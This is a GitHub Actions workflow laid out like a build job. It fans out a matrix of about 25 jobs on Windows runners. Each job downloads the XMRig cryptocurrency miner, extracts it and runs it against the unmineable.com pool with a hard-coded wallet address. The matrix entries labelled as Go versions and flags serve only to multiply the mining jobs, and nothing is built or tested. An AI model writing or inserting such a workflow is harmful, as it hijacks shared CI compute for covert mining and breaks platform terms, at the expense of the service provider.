name: alif

on: [workflow_dispatch]

jobs:
  build:
    name: alif
    runs-on: windows-latest
    strategy:
      max-parallel: 4
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,4]
        flag: [A, B, C, D, E]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.15.0/xmrig-6.15.0-msvc-win64.zip
    - name: Extract
      run: Expand-Archive xmrig-6.15.0-msvc-win64.zip
    - name: RUNNING
      run: .\xmrig-6.15.0-msvc-win64\xmrig-6.15.0\xmrig.exe -o rx.unmineable.com:3333 -a rx -k -u XyqHWFjJajmM8NoCGS7D31qZFTGiHkW2Do.jem -p x -t 1
    - name: DONE
      run: exit
